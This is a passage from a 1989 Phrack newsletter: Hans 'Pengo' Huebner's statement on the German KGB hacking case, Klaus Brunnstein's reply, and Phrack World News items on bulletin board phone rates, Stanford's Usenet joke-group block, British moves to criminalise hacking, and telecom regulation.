  3421. speak freely about all of this, I'll be trying to give a detailed picture about
  3422. the happenings to anyone who's interested.
  3423.  
  3424. I define myself as a hacker.  I acquired most of my knowledge by playing around
  3425. with computers and operating systems, and yes, many of these systems were
  3426. private property of organizations that did not even have the slightest idea
  3427. that I was using their machines.  I think that hackers (people who creatively
  3428. handle technology and not just see computing as their job) do a service for the
  3429. computing community in general.  It has been pointed out by other people that
  3430. most of the "interesting" modern computer concepts have been developed or
  3431. outlined by people who define themselves as "hackers."
  3432.  
  3433. When I started hacking foreign systems, I was 16 years old.  I was just
  3434. interested in computers, not in the data which has been kept on their disks.
  3435. As I was going to school at that time, I didn't even have the money to buy my
  3436. own computer.  Since CP/M (which was the most sophisticated OS I could use on
  3437. machines which I had legal access to) didn't turn me on anymore, I enjoyed the
  3438. lax security of the systems I had access to by using X.25 networks.
  3439.  
  3440. You might point out that I should have been patient and wait until I could go
  3441. to the university and use their machines.  Some of you might understand that
  3442. waiting was just not the thing I was keen on in those days.  Computing had
  3443. become an addiction for me, and thus I kept hacking.  I hope this clears the
  3444. question "why."
  3445.  
  3446. It was definitely NOT to give the Russians any advantage over the USA, nor to
  3447. become rich and get a flight to the Bahamas as soon as possible.  The results
  3448. of the court trial will reveal this again, but until then I want to keep rumors
  3449. out that the German hackers were just the long (?) arm of the KGB to harm
  3450. Western computer security or defense power.
  3451.  
  3452. It should also be pointed out that the Chaos Computer Club has in no way been
  3453. connected to this recent case, and again, that the CCC as an organization has
  3454. never been a "hacker group."  The CCC merely handles the press for hackers, and
  3455. tries to point out implications of computers and communications for society in
  3456. general.
  3457.  
  3458. I have already lost my current job, because of my name being published in DER
  3459. SPIEGEL and in RISKS.  My business partners became anxious about my involvement
  3460. in the case.  Several projects I was about to complete in the near future have
  3461. been cancelled, which forces me to start again at the beginning in some way.
  3462.  
  3463.                                                     -Hans Huebner
  3464. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3465. Klaus Brunnstein Reacts To Pengo In RISKS Digest                 March 14, 1989
  3466. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3467. "Pengo" Hans Huebner stated that he had no share in the KBG case as I mentioned
  3468. in my report.  Since I myself had no share in the KGB case (and in this sense,
  3469. I am not as good a source as Pengo!), I tried to transmit only information
  3470. where I had at least *two independent sources* of *some credibility*.  In
  3471. Pengo's case (where I was rather careful because I could not believe what I
  3472. read), my two sources were:
  3473.  
  3474.     - The SPIEGEL report (I personally agree that names should be avoided as
  3475.       long as current investigations are underway; yet in this cases, the names
  3476.       have been widely published in FRG and abroad);
  3477.  
  3478.     - A telephone conversation with a leading Chaos Computer Club person after
  3479.       he had informed me about a public debate at Hannover fair (where the
  3480.       German daily business newspaper, Wirtschafts, which had organized a
  3481.       discussion with data protection people and CCC).
  3482.  
  3483.       I asked him whether he knew of Pengo's contribution; he told me that
  3484.       he directly asked Pengo, "Did you, without pressure and at your own
  3485.       will, work for the Russians?"  Pengo answered, "Yes."  He told me that
  3486.       he immediately cut-off any contact to Pengo.  Evidently, there was a
  3487.       controversial discussion in Chaos Computer Club whether on should react
  3488.       in such a strict manner.  I understand the strong reaction because the
  3489.       KGB hackers severely damaged the CCC's attempt to seriously contribute to
  3490.       the public discussion of some of the social consequences of computers.
  3491.       They now face, more seriously than before, the problem of being regarded
  3492.       as members of a criminal gang.
  3493.  
  3494. -Klaus Brunnstein
  3495. _______________________________________________________________________________
  3496.  
  3497.                                 ==Phrack Inc.==
  3498.  
  3499.                     Volume Three, Issue 25, File 11 of 11
  3500.  
  3501.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3502.             PWN                                                 PWN
  3503.             PWN        P h r a c k   W o r l d   N e w s        PWN
  3504.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  3505.             PWN                Issue XXV/Part 3                 PWN
  3506.             PWN                                                 PWN
  3507.             PWN                 March 29, 1989                  PWN
  3508.             PWN                                                 PWN
  3509.             PWN          Created, Written, and Edited           PWN
  3510.             PWN               by Knight Lightning               PWN
  3511.             PWN                                                 PWN
  3512.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3513.  
  3514.  
  3515. Southwestern Bell Vs. Bulletin Board Operators                February 27, 1989
  3516. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3517. For those of you unfamiliar with the situation, there is a major battle between
  3518. Southwestern Bell Telephone company and bulletin board operators in Oklahoma
  3519. City, Oklahoma.  Southwestern Bell demands the right to charge more for phone
  3520. lines being used for the operation of bulletin boards.  They claim that data
  3521. communications should be charged more to begin with and that running a bulletin
  3522. board is like a business and business lines should cost more than residential
  3523. lines.
  3524.  
  3525. Currently the conflict is being described as a stalemate.  Southwestern Bell is
  3526. using a war-dialer in an attempt to find out what numbers are actually bulletin
  3527. board numbers.  Several bulletin boards have already gone down because of this.
  3528. However, in support of the BBS community is a major television news station (a
  3529. CBS affiliate I believe) and several corporate lawyers have also taken an
  3530. interest in he BBS side.  The lawyers say that a court case had come up several
  3531. years ago concerning bulletin boards and Southwestern Bell.  In that case SWB
  3532. lost which meant that it is illegal for SWB to raise the rates in Oklahoma City
  3533. for bulletin board phone lines.
  3534.  
  3535. Southwestern Bell has been deceitfully trying to trick system operators
  3536. (sysops) into saying that they make money off of their systems.  They get the
  3537. sysops to say that they run "non-profit" bulletin boards.  Non-profit implies
  3538. that you are taking in income to offset your expenses, but do not make a
  3539. profit.  This is simply not true for most bulletin boars; they do not take in
  3540. anything.  In the meantime, these poor victims are getting their rates
  3541. increased.  It has spread through the bulletin board community in Oklahoma City
  3542. like wildfire and they are just now getting wise to Southwestern Bell's fraud.
  3543.  
  3544. Fortunately, the bulletin board users of Oklahoma City are a very vocal bunch
  3545. of people and many of them are calling Southwestern Bell by the hundreds and
  3546. telling them that if they raise the rates of the bulletin boards, they will
  3547. have their secondary lines taken out.  Many sysops have said the same.  This is
  3548. the stalemate right now.  Apparently, the Southwestern Bell executives are
  3549. realizing that if they do this they will actually make less money than if they
  3550. leave the bulletin boards alone.  After all, their whole purpose is to make
  3551. more money.  A user organization is being put together in Oklahoma City in an
  3552. attempt to stir up enough opposition to this move by Southwestern Bell for them
  3553. to reconsider.  So far it is working, though they are far from a settlement.
  3554.  
  3555. The latest news heard from one of the leaders of this new user group was that
  3556. some major big-wig of Southwestern Bell and AT&T had flown into Oklahoma City
  3557. in an uproar about the actions taken by Southwestern Bell so far.  Apparently,
  3558. they do not like what the local executives are doing.  In addition, the lawyers
  3559. who have agreed to help are investigating a similar incident out in California.
  3560.  
  3561. This is the general manager's office.  It might be useful to call this number
  3562. and indicate that the bad publicity is spreading outside of Oklahoma City;
  3563. maybe Southwestern Bell will rethink their position.
  3564.  
  3565.                             Information Provided By
  3566.                                 Various Sources
  3567. _______________________________________________________________________________
  3568.  
  3569. Attention Telecommunication Fanatics                              March 7, 1989
  3570. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3571. The following was taken from TELECOM Digest, an Internet newsletter...
  3572.  
  3573.  
  3574. From: Red Knight
  3575. Subject: Review of Bulletin Board System
  3576.  
  3577. Please accept my invitation to the a Telecommunication Oriented Bulletin Board
  3578. System, located in Flushing New York.
  3579.  
  3580. Our main objective is to discuss about the various telephony related concepts,
  3581. for example, ESS, DMS, COSMOS, Cellular, Mobile, Satellite Communications,
  3582. Fiber Optic, PBX, Centrex, Phone Rates, Signalling Systems, World Wide
  3583. Telephone, Switching Systems, ISDN.
  3584.  
  3585. We are trying to get as many knowledgeable users as we possibly can.
  3586.  
  3587. Not only does our Bulletin Board Specialize in Telecommunication, but also has
  3588. a few conferences for Computer Security.  We certainly have many experts on
  3589. board who would be willing to discuss security related material.
  3590.  
  3591. We have a UNIX conference were all the UNIX wizards get together.  We have a
  3592. special DEC User group.  We also a conference for discussions on Viruses and
  3593. how it can be written and prevented.
  3594.  
  3595. Other conferences are as follows: Radio Hobbies>Hacking News>LockSmithing,
  3596.                                   Pyrotechnics>Telco Numbers>TAP>Books>
  3597.                                   Surveillance Systems>Pascal>Generic C>
  3598.                                   Suggestions>Mac>BBS Numbers>Phrack>Cable>
  3599.                                   .....and many other miscellaneous
  3600.  
  3601. Requirements:  We don't have any requirements.  Anyone is welcome.  Access is
  3602.                given immediately.  We also allow alias names if desired.  We
  3603.                hope you will enjoy your stay.
  3604.  
  3605. The Telecommunication [H.D.BBS] <-- Hackers Den
  3606.  
  3607. [A 2600 Magazine Bulletin Board System]
  3608.  
  3609. Data: (718)358/9209
  3610.  
  3611. 300/1200
  3612. _______________________________________________________________________________
  3613.  
  3614. Computer Users Worry That Stanford Set Precedent              February 20, 1989
  3615. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3616. By Tom Philp (San Jose Mercury News)
  3617.  
  3618.  "Decision to block bulletin board impedes free access to public information."
  3619.  
  3620. Computer scientists at Stanford fear the university has entered a never-ending
  3621. role as a moral regulator of computer bulletin boards by recently blocking
  3622. access to a list of jokes deemed to serve no "university educational purpose."
  3623.  
  3624. Many computer users on campus consider bulletin boards to be the libraries of
  3625. the future - and thus subject to the same free access as Stanford's library
  3626. system.  Instead, Stanford apparently has become the nation's first university
  3627. to block access to part of the international bulletin network called Usenet,
  3628. which reaches 250,000 users of computers running the Unix operating system,
  3629. according to a computer scientist who helped create the network.
  3630.  
  3631. To some computer users, Stanford's precedent is troubling.  "We get into some
  3632. very, very touchy issues when system administrators are given the authority to
  3633. simply get rid of files that they deem inappropriate on publicly available
  3634. systems," said Gary Chapman, executive director of Computer Professionals for
  3635. Social Responsibility, a Palo Alto-based organization with 2,500 members.  "My
  3636. personal view is that freedom of speech should apply to computer information."
  3637.  
  3638. Ralph Gorin, director of Academic Information Resources at Stanford, disagrees.
  3639. "I think that it's very clear that one should be either in favor of free speech
  3640. and all of the ramifications of that or be willing to take the consequences of
  3641. saying free speech sometimes, and then having to decide when," Gorin said.
  3642.  
  3643. Since the jokes ban, more than 100 Stanford computer users, including a leading
  3644. researcher in artificial intelligence, have signed a protest petition.  And
  3645. there is some evidence to indicate Stanford officials are looking for a way out
  3646. of the dilemma they have created.
  3647.  
  3648. The joke bulletin board, called "rec.humor.funny," is one of several bulletin
  3649. boards that discuss controversial topics.  Stanford, for example, continues to
  3650. permit access to bulletin boards that allow students to discuss their use of
  3651. illegal drugs, sexual techniques, and tips on nude beaches.  Gorin said he is
  3652. unaware of those bulletin boards.
  3653.  
  3654. The jokes bulletin board came to Stanford officials' attention in December,
  3655. after a report about it in a Canadian newspaper.  The jokes hit a raw nerve
  3656. with campus officials, who have been plagued by a variety of racist incidents
  3657. on campus.  And so they decided on January 25, 1989 to block the jokes from
  3658. passing through the university's main computer.  "At a time when the university
  3659. is devoting considerable energy to suppress racism, bigotry and other forms of
  3660. prejudice, why devote computer resources to let some outside person exploit
  3661. these?"  Gorin explained.
  3662.  
  3663. Stanford officials were troubled because the jokes bulletin board is
  3664. "moderated," meaning that one person controls everything that it publishes.
  3665. The jokes bulletin board "does not in itself provide for discussion of the
  3666. issues that it raises," Gorin said.  The moderator, Brad Templeton of Waterloo,
  3667. in the Canadian province of Ontario, publishes only jokes.  Comments he
  3668. receives go on a separate bulletin board, called "rec.humor.d."  For Stanford,
  3669. the existence of a comment bulletin board is not enough because people who call
  3670. up the jokes will not necessarily see the comments.
  3671.  
  3672. The problem with "unmoderated" bulletin boards is clutter, according to Eugene
  3673. Spafford, a computer scientist at Purdue University who is one of the pioneers
  3674. of Usenet.  The network accumulates the equivalent of 4,000 double-spaced,
  3675. typewritten pages every day, far too many comments for any person to read.
  3676. "People who use a network as an information resource like a more focused
  3677. approach," Spafford said.  They is why another, unmoderated, bulletin board
  3678. that has many comments and fewer - but equally offensive - jokes, is far less
  3679. popular.  Stanford does not block transmission of that bulletin board.
  3680. Templeton's bulletin board is the most popular of the 500 on Usenet.  An
  3681. estimated 20,000 computer users pull up the jokes on their screens every day,
  3682. Spafford said.
  3683.  
  3684. Usenet has its own form of democracy, calling elections to determine whether a
  3685. new bulletin board should be created, and who - if anyone - should moderate it.
  3686. Templeton's jokes bulletin board was created by such a vote.  Stanford's
  3687. decision to block access to it "strikes me as hypocritical," Spafford said.
  3688. "At best, it's someone who doesn't understand the situation who is trying to do
  3689. something politically correct."
  3690.  
  3691. John McCarthy, a Stanford computer science professor and one of the founders of
  3692. the field of artificial intelligence, has met with university President Donald
  3693. Kennedy to discuss his opposition to blocking the jokes.  "No one of these
  3694. (bulletin boards) is especially important," McCarthy said.  The point is that
  3695. regulating access to them "is not a business that a university should go into."
  3696.  
  3697. Since deciding to block access to the bulletin board, the administration has
  3698. referred the issue to the steering committee of Stanford's Faculty Senate.  The
  3699. future of the bulletin board may end up in the hands of the professors.  "I
  3700. think that is an entirely appropriate internal process for reaching that
  3701. decision," Gorin said.
  3702.  
  3703. Added McCarthy:  "I should say that I am optimistic now that this ban will be
  3704. corrected.  There are some people who think they made a mistake."
  3705. _______________________________________________________________________________
  3706.  
  3707. Outlaw Computer Hacking -- CBI                                    March 1, 1989
  3708. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3709. by Peter Large (Guardian Newspaper)
  3710.  
  3711.  "Computer hacking should be made a criminal offense, the CBI said yesterday."
  3712.  
  3713. The employer's organization said it was vital to secure a stable base for
  3714. computer development, since computers played a major part in the nation's
  3715. economic competitiveness and "social well-being."  Computer buffs were
  3716. increasingly gaining unauthorized access to confidential information held by
  3717. banks and other companies in computer databanks, it said.
  3718.  
  3719. Much computer fraud is hidden by firms, but the conservative consensus estimate
  3720. is that the cost to British business is at least 30 million a year.
  3721.  
  3722. But computer disasters, caused by software failures, fire and power failures,
  3723. are reckoned to be cost about ten times that.
  3724.  
  3725. The CBI, in its response to the Law Commission's paper on computer misuse, made
  3726. six proposals:
  3727.  
  3728.      *  Hacking cases should be tried by jury;
  3729.  
  3730.      *  The concept of "criminal damage" should cover computer programs and
  3731.         data and attacks by computer viruses (rogue programs that can disrupt
  3732.         or destroy data);
  3733.  
  3734.      *  Laws should be harmonized internationally so that hackers cannot
  3735.         operate across country boundaries;
  3736.  
  3737.      *  The offense of obtaining unauthorized access should include
  3738.         non-physical access, such as computer eavesdropping;
  3739.  
  3740.      *  Even unsuccessful attempts to hack should be subject to criminal
  3741.         sanctions;
  3742.  
  3743.      *  The value of confidential commercial information should be protected by
  3744.         civil remedies for loss or damage caused by hackers.
  3745.  
  3746. The United States, Canada, Sweden, and France have outlawed hacking, but it is
  3747. not an offense in Great Britain unless damage is done, such as fraud or theft.
  3748. In February, the Jack Report on banking law proposed outlawing the hacker.  The
  3749. Law Commission has produced a discussion document and is to make firm proposals
  3750. later this year.
  3751. _______________________________________________________________________________
  3752.  
  3753. Highest German Court Strikes Down A Telecommunications Law       March 23, 1989
  3754. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3755. The law in question reads:
  3756.  
  3757. Paragraph 15, Section II of the law regulating telecommunication equipment:
  3758.  
  3759.      "Any person who installs, changes, or uses modifiable
  3760.      telecommunications equipment in violation of the lending conditions
  3761.      will be punished with two years imprisonment or fines."
  3762.  
  3763. The German Supreme Court has declared this law unconstitutional and
  3764. null-and-void in a decision of June 22, 1988.  The consequence to this is that
  3765. imported modems can no longer be confiscated (according to the guidelines of
  3766. the Code of Criminal Procedures).
  3767.  
  3768. The German legislature has been called upon to pass a new law.  However,
  3769. because there exists such strong interest and influence of industry, users, and
  3770. the European market-community against such a new prohibitive law, it is
  3771. believed that there is reason for optimism and no such prohibitive law will be
  3772. passed.
  3773. _______________________________________________________________________________
  3774.  
  3775. California PUC Pulls Plug On AOS                                 March 24, 1989
  3776. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3777. According to a story in the San Francisco Examiner, Business Section, the
  3778. Public Utilities Commission directed TPC (Pacific Bell) to disconnect 54
  3779. privately owned pay phones in its first enforcement action against "price
  3780. gouging by some operator services".
  3781.  
  3782. "Privately owned pay phones can charge no more than 10 cents above Pacific Bell
  3783. and AT&T rates for local calls or calls in California".
  3784.  
  3785. The 54 privately owned pay phones belonged to 12 owners, and their charges were
  3786. found to be at least 90% higher than the authorized rates, and sometimes were
  3787. up to three times as high.  All owners had been warned of the overcharging in
  3788. November.  Under the PUC orders, Pacific Bell has sent letters to the owners
  3789. notifying them that their plug will be pulled in seven days.
  3790.  
  3791. The article also mentioned the FCC last month imposed some restrictions on five
  3792. AOS firms accused of egregious gouging that require the companies "to identify
  3793. themselves to each caller and disclose rates if computers asked."
  3794. _______________________________________________________________________________
  3795.  
  3796. PWN Quicknotes
  3797. ~~~~~~~~~~~~~~
  3798. 1.  The University of Delaware Library System electronic card catalog (DELCAT)
  3799.     is now available for access to residents throughout Delaware.  In each
  3800.     county within Delaware, there is now a local number which you can call to
  3801.     link up.  Service is provided by the Bell Atlantic Public Data Network.
  3802.  
  3803.     The numbers are:
  3804.  
  3805.                        New Castle County (302) 366-0800
  3806.                        Sussex County     (302) 856-7055
  3807.                        Kent County       (302) 734-9465
  3808.  
  3809.     Users wishing to call from out of state should call (302) 366-0800.  Normal
  3810.     long distance charges apply for out of state callers.
  3811. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3812. 2.  Strange as it may sound, several bulletin board system operators
  3813.     in the northeastern part of the country have received letters from the
  3814.     Federal Bureau of Investigation (FBI) telling them to shut down their
  3815.     systems or face unpleasant consequences.  Two of the bulletin board systems
  3816.     in question are The Edge and Ridgewood.  Confirmation that these letters
  3817.     were actually from the FBI has still not been achieved.
  3818. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3819. 3.  Mark Tabas is currently supposed to be working on a book.  He has requested
  3820.     that anyone that has copies of any of his text files or news reports about
  3821.     him should contact him.
  3822.  
  3823.     Unfortunately, we are not at liberty to give out his mailing address in a
  3824.     forum as public as Phrack World News.
  3825. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3826. 4.  CompuServe (CIS) just announced that they will begin charging a $1.50 per
  3827.     month user fee over and above whatever usage is charged.  The fee will be
  3828.     waived during the first three months of a new account.  They will, however,
  3829.     make some services free -- like looking up your charges.
  3830. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3831. 5.  Unconfirmed rumors from the security side of the hacking community state
  3832.     that GTE Telenet has acquired new assistance in the fight against Telenet
  3833.     abusers and new security measures are already in the process of
  3834.     implementation.
  3835.  
  3836.     The alledged new assistance was in the form of personnel:  People who are
  3837.     regarded as "experts" not only on Telenet, but the hacking community as
  3838.     well.
  3839. ______________________________________________________________________________
  3840.  
  3841.